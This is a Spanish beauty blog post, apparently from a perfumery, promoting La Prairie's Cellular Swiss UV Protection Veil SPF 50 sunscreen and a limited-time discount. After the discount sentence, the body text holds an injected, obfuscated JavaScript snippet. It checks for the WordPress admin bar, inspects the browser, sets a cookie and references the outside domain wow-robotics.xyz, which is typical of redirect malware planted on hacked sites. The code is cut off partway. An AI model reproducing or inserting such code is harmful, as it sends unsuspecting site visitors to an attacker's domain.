cellular swiss protection veil 50 SPF la prairie

La Prairie ha lanzado al mercado un protector solar que muchas estabámos esperando.

Cellular Swiss UV Protection Veil SPF 50 de La Prairie no es un sólo un protector solar y eso ya es un factor que no nos deja indiferentes.

En primer lugar Cellular Swiss UV Protection Veil SPF 50 de La Prairie nos protege contra las agresiones que el medio ambiente puede provocar sobre nuestra piel. Su efectivo tratamiento lucha además contra la sequedad, la falta de hidratación o el enrojecimiento de la piel consiguiendo una piel joven y sobretodo protegida durante todo el día.

Pero os preguntaréis porque es especial Cellullar Swiss UV Protection Veil SPF 50 de La Prairie que no tienen el resto de protectores solares pues principalmente su formulación basada en potentes ingredientes que ofrecen como resultado un súper poderoso protector solar.

Flor de Edelweiss y agua de los glaciares suizos con espectaculares propiedades anti-oxidantes que nos protegen y defienden de agresiones externas.

Cuenta con un complejo iluminador a base de regaliz y cristales blancos que mejoran el aspecto de la piel y unifican el tono.

cellular swiss la prairie

Gracias a sus ingredientes Cellular Swiss UV Protection Veil SPF 50 de La Prairie conseguimos los siguientes beneficios:

  • Protección total contra los rayos UVB y UVA no olvidemos que son la principal causa de envejecimiento de la piel, por lo que prevenimos el envejecimiento prematuro de la piel.
  • Su gran poder antioxidante hace que sea compatible con la barrera protectora de la piel.
  • Nos ayuda a mejorar la producción de melanina.
  • Mejora el tono natural de la piel de forma uniforme y evita irritaciones.
  • Su actividad exfoliante afina la piel consiguiendo eliminar impurezas.
  • Aporta hidratación en profundidad gracias a su formulación en la que se incorporan oligoelementos.

¿Como aplicaremos Cellular Swiss UV Protection Veil de La Prairie?

Cada mañana con el rostro limpio extenderemos una pequeña cantidad de producto por mejillas, frente, nariz y cuello. Una vez notemos que se ha absorbido el producto podemos aplicar nuestro tratamiento de día habitual.

Protege este verano tu rostro del sol a la vez que iluminas tu dermis.

la-prairie-cellular-swiss-uv-protection-veil

Además esta semana en Perfumerías Tin Tin queremos ponertelo muy fácil, encuentra tus productos La Prairie favoritos con hasta un 25% de descuento, sólo hasta el 28 de Junio. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone